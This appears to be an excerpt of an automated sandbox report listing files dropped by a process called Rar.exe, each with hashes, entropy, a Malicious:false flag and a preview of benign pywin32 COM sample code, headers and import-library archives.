                                                                                                                                                                                                                                  SHA1:BA39AF38ECA07AB6510170D33A7CBFFBD65DB51D
                                                                                                                                                                                                                                  SHA-256:CCFC5FAD479402B41C2299CCB3468680DEE120BFA76B0A0E0C4F34E7866AF6DC
                                                                                                                                                                                                                                  SHA-512:B4F4777CAF6BA19EA084833FE7824A8AC42A8CFA6BFDD4845BED030E3AC16D6CE7E3D748309A69CDA9205E3492C317077D93BB7B4AE00D10F39580E07520BA0D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""General client side utilities...This module contains utility functions, used primarily by advanced COM.programmers, or other COM modules..""".import pythoncom.from win32com.client import Dispatch, _get_good_object_..PyIDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch]...def WrapEnum(ob, resultCLSID=None):. """Wrap an object in a VARIANT enumerator... All VT_DISPATCHs returned by the enumerator are converted to wrapper objects. (which may be either a class instance, or a dynamic.Dispatch type object)... """. if type(ob) != pythoncom.TypeIIDs[pythoncom.IID_IEnumVARIANT]:. ob = ob.QueryInterface(pythoncom.IID_IEnumVARIANT). return EnumVARIANT(ob, resultCLSID)...class Enumerator:. """A class that provides indexed access into an Enumerator.. By wrapping a PyIEnum* object in this class, you can perform. natural looping and indexing into the Enumerator... Looping is very efficient, but it should be noted that although random. access is suppo
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3894
                                                                                                                                                                                                                                  Entropy (8bit):4.8078641484480125
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:OJuvuqYsmZI8WMM1hEtQPhq6vUMMc7X7nDFZpu/kHLcv:OJuWqYsvRPhES9McJZ8MHLcv
                                                                                                                                                                                                                                  MD5:122A930971B0763428CDDB507BF9232B
                                                                                                                                                                                                                                  SHA1:B9065E8EB53905A4E383AE26AF210436C4045C34
                                                                                                                                                                                                                                  SHA-256:9B305A5BEE20D5D2637AEE832B2DCBA21E1EE23630F8F2C3BA43F7AA2B585EDB
                                                                                                                                                                                                                                  SHA-512:F4346A84C7CF9358276BBF51A5CC42A8C2767677A8E884CF3FC5A4C4DE4851AF52EC1577171681814CB1101563D6706E384764F743FAF537DA9EFC321ECDCEEB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Implements _both_ a connectable client, and a connectable server..#.# Note that we cheat just a little - the Server in this demo is not created.# via Normal COM - this means we can avoid registering the server..# However, the server _is_ accessed as a COM object - just the creation.# is cheated on - so this is still working as a fully-fledged server...import pythoncom.import win32com.server.connect.import win32com.server.util.from pywin32_testutil import str2bytes.from win32com.server.exception import Exception..# This is the IID of the Events interface both Client and Server support..IID_IConnectDemoEvents = pythoncom.MakeIID("{A4988850-49C3-11d0-AE5D-52342E000000}")..# The server which implements.# Create a connectable class, that has a single public method.# 'DoIt', which echos to a single sink 'DoneIt'...class ConnectableServer(win32com.server.connect.ConnectableServer):. _public_methods_ = [. "DoIt". ] + win32com.server.connect.ConnectableServer._public_methods_.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2948
                                                                                                                                                                                                                                  Entropy (8bit):4.564498202320599
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:/LebwXuCKnbbnkPz2GXPSCzYh9dbSxSlcs9Lk0mpOqCORkT7A3R7+2tZQezY:/Lec1KbLTGXPSuYvRSxCct0mpPCjTSkP
                                                                                                                                                                                                                                  MD5:5BECE80B04F95E1085EE003B5E060DA6
                                                                                                                                                                                                                                  SHA1:8628ED3F2FA6D0035BB6F3892604F429C8D4AC1F
                                                                                                                                                                                                                                  SHA-256:230D40B68504B41FE6D3905735F6DC07D2A8ED8B1B766C2175DDBD3DE6D895AD
                                                                                                                                                                                                                                  SHA-512:60D7DF761C60572876394883DED753DF7A19B53C2C9C3E37B33F6C81992EEB2A507493D16F1ECE964F1628CB8C669662CF07262183F49A53556CAFAF4C5129E3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import pythoncom.import win32con..formats = """CF_TEXT CF_BITMAP CF_METAFILEPICT CF_SYLK CF_DIF CF_TIFF. CF_OEMTEXT CF_DIB CF_PALETTE CF_PENDATA CF_RIFF CF_WAVE. CF_UNICODETEXT CF_ENHMETAFILE CF_HDROP CF_LOCALE CF_MAX. CF_OWNERDISPLAY CF_DSPTEXT CF_DSPBITMAP CF_DSPMETAFILEPICT. CF_DSPENHMETAFILE""".split().format_name_map = {}.for f in formats:. val = getattr(win32con, f). format_name_map[val] = f..tymeds = [attr for attr in pythoncom.__dict__.keys() if attr.startswith("TYMED_")]...def DumpClipboard():. do = pythoncom.OleGetClipboard(). print("Dumping all clipboard formats..."). for fe in do.EnumFormatEtc():. fmt, td, aspect, index, tymed = fe. tymeds_this = [. getattr(pythoncom, t) for t in tymeds if tymed & getattr(pythoncom, t). ]. print("Clipboard format", format_name_map.get(fmt, str(fmt))). for t_this in tymeds_this:. # As we are enumerating there should be no need
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3666
                                                                                                                                                                                                                                  Entropy (8bit):4.708146579094374
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dlJlyKGuMR80LnqiR1qCOlMBLN/2XqDa5wt:vOluMFL1wlaLxAfit
                                                                                                                                                                                                                                  MD5:7B67C9B10BF9296E26C31A537CA3A7EA
                                                                                                                                                                                                                                  SHA1:EC4D7AEF8133DDF2C4F1A82C59351313C025519F
                                                                                                                                                                                                                                  SHA-256:55F3A355A7136FF55725BC0468097AA605026BACBF0CDE4A3371FA739A0C3E95
                                                                                                                                                                                                                                  SHA-512:DA7D29471A0AACA917AB1AD20B3E2BD834D8592907E787706658F380335C3645F2FE6C00F5B14CA1BAEAF023D3A39E3FF7E59EB28FC604F000BDB4708A175906
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A sample originally provided by Richard Bell, and modified by Mark Hammond...# This sample demonstrates how to use COM events in an aparment-threaded.# world. In this world, COM itself ensures that all calls to and events.# from an object happen on the same thread that created the object, even.# if they originated from different threads. For this cross-thread.# marshalling to work, this main thread *must* run a "message-loop" (ie,.# a loop fetching and dispatching Windows messages). Without such message.# processing, dead-locks can occur...# See also eventsFreeThreaded.py for how to do this in a free-threaded.# world where these marshalling considerations do not exist...# NOTE: This example uses Internet Explorer, but it should not be considerd.# a "best-practices" for writing against IE events, but for working with.# events in general. For example:.# * The first OnDocumentComplete event is not a reliable indicator that the.# URL has completed loading.# * As we are demonstrating
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3464
                                                                                                                                                                                                                                  Entropy (8bit):4.703893146931307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:V37jteSYpmMRpon2dFw0oLFhI4rueKpDDqABMY1qAw/2XqAsCZ5Y7XVZ+Do+GnZx:xYQMRPixhHunqiR1qn/2XqDaU6SUIt
                                                                                                                                                                                                                                  MD5:0A4587CA277DF0591C0FBCFA4000FBEB
                                                                                                                                                                                                                                  SHA1:FF8BD298F13DB23C4E468182244FDCCA4F8EA43A
                                                                                                                                                                                                                                  SHA-256:5A87150FAB137377757B2D09AC942CF1CEBC7112139AB35B347E9B48BCDEA8EA
                                                                                                                                                                                                                                  SHA-512:D330B50D95A161A0F623F53E600CD630E50462443DE152F870EDD1B6E93D51C7A86920C9F87760E993878FF782940FC1F7B7FC7E4D9085A13E878E6B18B1F585
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A sample originally provided by Richard Bell, and modified by Mark Hammond...# This sample demonstrates how to use COM events in a free-threaded world..# In this world, there is no need to marshall calls across threads, so.# no message loops are needed at all. This means regular cross-thread.# sychronization can be used. In this sample we just wait on win32 event.# objects...# See also ieEventsApartmentThreaded.py for how to do this in an.# aparment-threaded world, where thread-marshalling complicates things...# NOTE: This example uses Internet Explorer, but it should not be considerd.# a "best-practices" for writing against IE events, but for working with.# events in general. For example:.# * The first OnDocumentComplete event is not a reliable indicator that the.# URL has completed loading.# * As we are demonstrating the most efficient way of handling events, when.# running this sample you will see an IE Windows briefly appear, but.# vanish without ever being repainted...im
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6113
                                                                                                                                                                                                                                  Entropy (8bit):5.140198564686407
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Ys+uSjXATySNDrYJgw3KbAq3aFaTJghDSbGa2zoyb61Fl9T+d2Rtb5YWGim4QQGo:d+uKATRDrsgw3W3uIJ0IGa2s11Fh5YOf
                                                                                                                                                                                                                                  MD5:C71AD79D2BE8D1C6F7F034CAE1CCF217
                                                                                                                                                                                                                                  SHA1:A3B9FFF9DF0E4AD4CF248AB9732A1A71AC5417EC
                                                                                                                                                                                                                                  SHA-256:41D219244D8F77A45B06EC8E99819FA61449EFE49E11EC472AE6EB3F2B589707
                                                                                                                                                                                                                                  SHA-512:1F701DD265693BCFB9D9E0E20B401D90D484C13CCF38E48258463CB0D6DF21CD2CB4C7F6E884DC3391C07E38C7EB792E4ECAFA838646EB3EA82BB925C4537272
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo plugin for Microsoft Excel.#.# This addin simply adds a new button to the main Excel toolbar,.# and displays a message box when clicked. Thus, it demonstrates.# how to plug in to Excel itself, and hook Excel events..#.#.# To register the addin, simply execute:.# excelAddin.py.# This will install the COM server, and write the necessary.# AddIn key to Excel.#.# To unregister completely:.# excelAddin.py --unregister.#.# To debug, execute:.# excelAddin.py --debug.#.# Then open Pythonwin, and select "Tools->Trace Collector Debugging Tool".# Restart excel, and you should see some output generated..#.# NOTE: If the AddIn fails with an error, Excel will re-register.# the addin to not automatically load next time Excel starts. To.# correct this, simply re-register the addin (see above).#.# Author <ekoome@yahoo.com> Eric Koome.# Copyright (c) 2003 Wavecom Inc. All rights reserved.#.# Redistribution and use in source and binary forms, with or without.# modification, are permitte
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16255
                                                                                                                                                                                                                                  Entropy (8bit):4.784702077372018
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wwB/xRuKNx996Mb2kuT/0je8KGCP+RjGUxFr7NKLCVdLDZ4:F/xRuKNnBbG0jeRGCG7cL2dLN4
                                                                                                                                                                                                                                  MD5:F4A8D236736CCE64076DD84EEA3DC1C6
                                                                                                                                                                                                                                  SHA1:D329100BB5719CD86CBB25DD6FF8504E65DA0F53
                                                                                                                                                                                                                                  SHA-256:AB3348F8C9314A1ABB335C0811A693312DDD41C2E386DA781D54A7FA8F8FFA07
                                                                                                                                                                                                                                  SHA-512:976A4DC59C1CEA00289A8994BF6AEA72892F0531BEC02472BEC7B9D81D1FFA62ADC2E0D1AEF582F4DE3D9665B2BA1870C750D213B9A006B08C22FE67CA168CA0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Excel IRTDServer implementation...This module is a functional example of how to implement the IRTDServer interface.in python, using the pywin32 extensions. Further details, about this interface.and it can be found at:. http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnexcl2k2/html/odc_xlrtdfaq.asp."""..# Copyright (c) 2003-2004 by Chris Nilsson <chris@slort.org>.#.# By obtaining, using, and/or copying this software and/or its.# associated documentation, you agree that you have read, understood,.# and will comply with the following terms and conditions:.#.# Permission to use, copy, modify, and distribute this software and.# its associated documentation for any purpose and without fee is.# hereby granted, provided that the above copyright notice appears in.# all copies, and that both that copyright notice and this permission.# notice appear in supporting documentation, and that the name of.# Christopher Nilsson (the author) not be used in advertising or publicity.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ISO-8859 text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7085
                                                                                                                                                                                                                                  Entropy (8bit):4.96839296134514
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:+cq3/1skZPkAkmx9Kam3qAA/lhouvXDGR:+c6x9kAtA
                                                                                                                                                                                                                                  MD5:9F76D1AF1057C9B4F1FDA69DDB81CF8C
                                                                                                                                                                                                                                  SHA1:5CB456ADCD12C3FC013867FFB3B28BD2B67645E1
                                                                                                                                                                                                                                  SHA-256:C0E6B891E5C044FE0B986CBB4EA1103C865B11C88BDBE02777F98E3BF939FFD3
                                                                                                                                                                                                                                  SHA-512:E3CE5F716C4ADDF168E1A41A0971366796667A24C17E800233622936AF21A21ADD86005B86757D6B39C543034371B8AD4C3E94299B22324A425046A24F5DBD53
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: latin-1 -*-..# PyWin32 Internet Explorer Button.#.# written by Leonard Ritter (paniq@gmx.net).# and Robert F.rtsch (info@robert-foertsch.com)...""".This sample implements a simple IE Button COM server.with access to the IWebBrowser2 interface...To demonstrate:.* Execute this script to register the server..* Open Pythonwin's Tools -> Trace Collector Debugging Tool, so you can. see the output of 'print' statements in this demo..* Open a new IE instance. The toolbar should have a new "scissors" icon,. with tooltip text "IE Button" - this is our new button - click it..* Switch back to the Pythonwin window - you should see:. IOleCommandTarget::Exec called.. This is the button being clicked. Extending this to do something more. useful is left as an exercise...Contribtions to this sample to make it a little "friendlier" welcome!."""..# imports section..import pythoncom.import win32api.import win32com.import win32com.server.register.from win32com import universal.from win
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ISO-8859 text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11009
                                                                                                                                                                                                                                  Entropy (8bit):4.724867722730395
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:DclLpsSg/O7dAy1kne9TDfxTa9FMH101vCwtsLBht9OBBfvOtbp:DclLpS2v1kne9HIFO101vJGsE
                                                                                                                                                                                                                                  MD5:C20570F72D0898158348D2E629E4ACCD
                                                                                                                                                                                                                                  SHA1:844365436EB8792B04254D5AE41D68EB4C92B6ED
                                                                                                                                                                                                                                  SHA-256:C6E23015E8EBCEFB43B2E0CB8BBF6C0A0729ACA6294CACE1E548A5D111D0B8EF
                                                                                                                                                                                                                                  SHA-512:90DA2DF7EE752D0131DDCFB4DABF1E5B7708EC4FBFDA5DC301A573106EF5FB7B5AC08547BF50C6B5F2B66557E5042449F30635883760BE0FC3AA099120C10086
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: latin-1 -*-..# PyWin32 Internet Explorer Toolbar.#.# written by Leonard Ritter (paniq@gmx.net).# and Robert F.rtsch (info@robert-foertsch.com)...""".This sample implements a simple IE Toolbar COM server.supporting Windows XP styles and access to.the IWebBrowser2 interface...It also demonstrates how to hijack the parent window.to catch WM_COMMAND messages.."""..# imports section.import sys.import winreg..import pythoncom.import win32com.from win32com import universal.from win32com.axcontrol import axcontrol.from win32com.client import Dispatch, DispatchWithEvents, constants, gencache, getevents.from win32com.shell import shell.from win32com.shell.shellcon import *..try:. # try to get styles (winxp). import winxpgui as win32gui.except:. # import default module (win2k and lower). import win32gui..import array.import struct..import commctrl.import win32con.import win32ui..# ensure we know the ms internet controls typelib so we have access to IWebBrowser2 later on.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4700
                                                                                                                                                                                                                                  Entropy (8bit):5.013799263198753
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Y+oVuyejXM32ghDS82a2zvVO1TfVAiiQQmoxNppa0fv27tx:EuyeM320z2a2ZO1T+QMpJfv27tx
                                                                                                                                                                                                                                  MD5:B82C0AB32A466625D8665B0FFA7E4F20
                                                                                                                                                                                                                                  SHA1:37F3A92CB66A57D3ACBF5C12C59D4F2E4C601E46
                                                                                                                                                                                                                                  SHA-256:FE60E008E7F39E35FB7B8680DAA21980013CCA574B2A072AFA5C7BD293ECF5C9
                                                                                                                                                                                                                                  SHA-512:D054905F6460B56020B3DAF6CACE0FB3413AB3A426417D88FC6FA4B5A0DFDB414C9150BB51C9054E5A7B8A8EE5BF01DFC12199C11F37E85BE0CC5EF3C5547389
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo plugin for Microsoft Outlook (NOT Outlook Express).#.# This addin simply adds a new button to the main Outlook toolbar,.# and displays a message box when clicked. Thus, it demonstrates.# how to plug in to Outlook itself, and hook outlook events..#.# Additionally, each time a new message arrives in the Inbox, a message.# is printed with the subject of the message..#.# To register the addin, simply execute:.# outlookAddin.py.# This will install the COM server, and write the necessary.# AddIn key to Outlook.#.# To unregister completely:.# outlookAddin.py --unregister.#.# To debug, execute:.# outlookAddin.py --debug.#.# Then open Pythonwin, and select "Tools->Trace Collector Debugging Tool".# Restart Outlook, and you should see some output generated..#.# NOTE: If the AddIn fails with an error, Outlook will re-register.# the addin to not automatically load next time Outlook starts. To.# correct this, simply re-register the addin (see above)..import sys..import pythoncom.fro
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2088
                                                                                                                                                                                                                                  Entropy (8bit):4.841312035932402
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:DezkLUSx4SXwuhnCOer+UtylNRCbcfqUDqaUMGkUs1x2W2RCu:DeXu4cw4n9gt0Cbc1edMGkUs1x2W2RX
                                                                                                                                                                                                                                  MD5:05A4C79538B5C128E768BB151D62B305
                                                                                                                                                                                                                                  SHA1:EC53BC9528D5BB0D72392C21556C7F8C8C18DEF7
                                                                                                                                                                                                                                  SHA-256:6455CA354B75CF3CFAB9402A1E20297B600FD07DE028B49FA2BC12818C3937B5
                                                                                                                                                                                                                                  SHA-512:0A4028F966F939A8239406A975B5860EEAF4FD3F45C6C66B8206D0D6371B07C69663680EBC138A60E992D1C4D0D8AE9F5AE671BF412A3B82D16AED47B23F2570
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import pythoncom.from win32com.server import exception, util..VT_EMPTY = pythoncom.VT_EMPTY...class Bag:. _public_methods_ = ["Read", "Write"]. _com_interfaces_ = [pythoncom.IID_IPropertyBag].. def __init__(self):. self.data = {}.. def Read(self, propName, varType, errorLog):. print("read: name=", propName, "type=", varType). if propName not in self.data:. if errorLog:. hr = 0x80070057. exc = pythoncom.com_error(0, "Bag.Read", "no such item", None, 0, hr). errorLog.AddError(propName, exc). raise exception.Exception(scode=hr). return self.data[propName].. def Write(self, propName, value):. print("write: name=", propName, "value=", value). self.data[propName] = value...class Target:. _public_methods_ = ["GetClassID", "InitNew", "Load", "Save"]. _com_interfaces_ = [pythoncom.IID_IPersist, pythoncom.IID_IPersistPropertyBag].. def GetClassID(self):. rai
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30291
                                                                                                                                                                                                                                  Entropy (8bit):5.191660584865603
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:T3NxCIlJB+AOxPMVJ4s6/ixXl3OPRUMM1sm8:T3NZJOxPgJ0/sXgPRl
                                                                                                                                                                                                                                  MD5:3AB6186148CDF889998AE52D3DD456ED
                                                                                                                                                                                                                                  SHA1:2B0A656ECDA5AF68F3309C875F6A0BF0D1C287D7
                                                                                                                                                                                                                                  SHA-256:B4787DA122CC411A498E1CEB8C9F553F61AB75C3C64C8880EF5FF916C6132427
                                                                                                                                                                                                                                  SHA-512:74E1D73C06FF3DD293A19326EC223DEFF8B3E2957251164E9B6CE696C3C03D8A14DA1F41F2A8123C7ECF1675EC26D5FE7FE4EB038D6E3E2CE6CCC7ABD1B331EE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:/* PythonCOM.h.. Main header for Python COM support... This file is involved mainly with client side COM support for. Python... Most COM work put together by Greg Stein and Mark Hammond, with a. few others starting to come out of the closet.... --------------------------------------------------------------------. Thread State Rules. ------------------. These rules apply to PythonCOM in general, and not just to. the client side... The rules are quite simple, but it is critical they be followed.. In general, errors here will be picked up quite quickly, as Python. will raise a Fatal Error. However, the Release() issue in particular. may keep a number of problems well hidden... Interfaces:. -----------. Before making ANY call out to COM, you MUST release the Python lock.. This is true to ANY call whatsoever, including the COM call in question,. but also any calls to "->Release();".. This is normally achieved with the calls. PY_INTERFACE_PRECALL and PY_INTERFACE_POSTCALL, which release. an
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4264
                                                                                                                                                                                                                                  Entropy (8bit):4.397028432654304
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:TyohkJzoxaK1tIEOrtl4Yz54ev7+RiAG9rh:Tyohk49OYYz54wqRiV9rh
                                                                                                                                                                                                                                  MD5:B198C9127BCD708943E89FA4DCF54414
                                                                                                                                                                                                                                  SHA1:950143556273F7D0EB815A59AFD17B32CB568552
                                                                                                                                                                                                                                  SHA-256:4727BC4FCA34D7C70FCC0897A78DFB94B88D82029668D0DD030E5DBD8C654FFF
                                                                                                                                                                                                                                  SHA-512:35EBAAC04C67857E9CA8388DFC24486928D03DC795268B864D44B051C30AE173F0535D50F5C3F5C2DB10C1F9DDDD630920E69C2B90590C9E87EDA391C0B21038
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:// Support for PythonCOM and its extensions to register the interfaces,.// gateways and IIDs it supports..//.// The module can simply declare an array of type PyCom_InterfaceSupportInfo, then.// use the macros to populate it..//.// See Register.cpp and AXScript.cpp for examples on its use...#ifndef __PYTHONCOMREGISTER_H__.#define __PYTHONCOMREGISTER_H__..#include "PythonCOMServer.h" // Need defns in this file.....typedef struct {. const GUID *pGUID; // The supported IID - required. const char *interfaceName; // Name of the interface - required. const char *iidName; // Name of the IID that goes into the dict. - required. PyTypeObject *pTypeOb; // the type object for client PyI* side - NULL for server only support.. pfnPyGatewayConstructor ctor; // Gateway (PyG*) interface constructor - NULL for client only support..} PyCom_InterfaceSupportInfo;..#define PYCOM_INTERFACE_IID_ONLY(ifc) \. {
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9027
                                                                                                                                                                                                                                  Entropy (8bit):4.474111423776976
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:nOiD5kIJMJ3PM9DxA/TwHwpev4aI4b4fj4Cbv4jDm4u4O4K474z4BIGmSTVA/qqD:nOiD+lPkH6ES/90g
                                                                                                                                                                                                                                  MD5:7A1C425DC9D5F72AA1A9AD6DA5D7A0F4
                                                                                                                                                                                                                                  SHA1:41C855FB6ED7B77C6BA2023C4DF379D8DB84C86F
                                                                                                                                                                                                                                  SHA-256:C8BAFAB9869FEF9EE906D514E8E06E928BC1C135FA2A68BC5F817DAD89EE478F
                                                                                                                                                                                                                                  SHA-512:AE7EB27F8B4398D5F62DF8C08D3B7E3D77294DD280696AAE3E5A9CFBAAA7EC71FD076DD9B9E6F8677F622E2BBA01E73290CC5FAA603619224BEBAA29DD60B4EA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#ifndef __PYTHONCOMSERVER_H__.#define __PYTHONCOMSERVER_H__..// PythonCOMServer.h :Server side COM support..#include <Python.h>..#define DLLAcquireGlobalLock PyWin_AcquireGlobalLock.#define DLLReleaseGlobalLock PyWin_ReleaseGlobalLock..void PYCOM_EXPORT PyCom_DLLAddRef(void);.void PYCOM_EXPORT PyCom_DLLReleaseRef(void);..// Use this macro at the start of all gateway methods..#define PY_GATEWAY_METHOD CEnterLeavePython _celp..class PyGatewayBase;.// Gateway constructors..// Each gateway must be able to be created from a "gateway constructor". This.// is simply a function that takes a Python instance as as argument, and returns.// a gateway object of the correct type. The MAKE_PYGATEWAY_CTOR is a helper that.// will embed such a constructor in the class - however, this is not necessary -.// _any_ function of the correct signature can be used...typedef HRESULT (*pfnPyGatewayConstructor)(PyObject *PythonInstance, PyGatewayBase *, void **ppResult, REFIID iid);.HRESULT PyCom_MakeRegistered
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:current ar archive
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):70698
                                                                                                                                                                                                                                  Entropy (8bit):5.414650454855484
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:B3Ct2UYJ28RE+7XFdaU8us+ASqaykDvZlbeXQUDYHBWkathYEnKp9l90ncY9P+Z+:B3Ct2UYJ2eAnKp9l9ngprsl+7
                                                                                                                                                                                                                                  MD5:E368160E8FD3E04AE678523D8732EDD9
                                                                                                                                                                                                                                  SHA1:1629D1298D21988B46ADEF5E971C85E8E25247EE
                                                                                                                                                                                                                                  SHA-256:E51D6CAAF41056327177FC03DC6C5BFBDC82E4A52B64FC87424CF70D16B8F694
                                                                                                                                                                                                                                  SHA-512:69BBD6AAC1008A035D8287D614B35C83F2424ED885D2FA3438602BE70246CFCFD654B4792F069F4B87BD40EB0F234C4F23C095B762036DF3420429C0DA78E3F8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:!<arch>./ -1 0 20695 `....i...~...................~.......&..........n.......N...t.............t...........n......."...............t.......V......L...R...R...................>...>...........:...:...........l...l..."..."...H...H.................................b...b...h...h...................................>...>...x...x...6...6...........................D...D...................|...|...Z...Z...........0...0...|...|...4...4...................0...0...b...b...........................b...b...........P...P................................."..."...........X...X...(...(.................................................J...J...........................<...<...2...2.........................................~...~...8...8...J...J...........r...r...................................Z...Z...........p...p...................n...n...........4...4.......................N...N...l...l.................x...x.........J...J...v...v.................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:current ar archive
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):155736
                                                                                                                                                                                                                                  Entropy (8bit):5.470470467759092
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:vt3gJ+MUw37r5vRE752vdPoDYwaYrT6oY0RsRSdQbM8:vt3gN37r5vi75WPoDYwJ6oY0RsRSST
                                                                                                                                                                                                                                  MD5:1E4E50A3C3EEC56A92D99859BC343A83
                                                                                                                                                                                                                                  SHA1:7B80F0508B27C217677A5B1DECA27FE5450BBA40
                                                                                                                                                                                                                                  SHA-256:DE8920C24121076DCC77753A536B40BDAB9D96A4EF8D71DFF42F2DDD284AA266
                                                                                                                                                                                                                                  SHA-512:4BE95CE619EE395D57F2B27F172A809E60914C14122D1BCC9930E6ADB36A86D38FE4A33FC1582BB4EA9D572959E34D1BFAC102186E53FD53351CA68875583487
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:!<arch>./ -1 0 44603 `....Y..]...`...aj...........b...b...................d...d.........................._..._........X.......@...4...............R...8...f......."..."...........T...T...........>...>...................6...6...Z...Z...........................................$...$..........................n...n...=...=...................m...m...=V..=V... ... ...........P...P..)...)...........}J..}J..(...(....f...f..~N..~N..)L..)L..........y...y...&...&....R...R..z...z...&...&...........l...l....~...~..........p...p...>...>...!...!....(...(..o...o... t.. t...h...h...P...P..*...*............................p...p...........|...|...........x...x..........j...j...N$..N$..M...M...FT..FT...b...b...................<...<...........8...8...x...x..0...1...10..0"..-...-...+...+....................J...J...<...<..K...K...c...c...M...M...Lz..Lz..d...d...J...J....@...@..e`..e`...........6...(...(...........p...p...................Z...Z..+...+...,...,.........
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30
                                                                                                                                                                                                                                  Entropy (8bit):3.973557262275185
                                                                                                                                                                                                                                  Encrypted:false
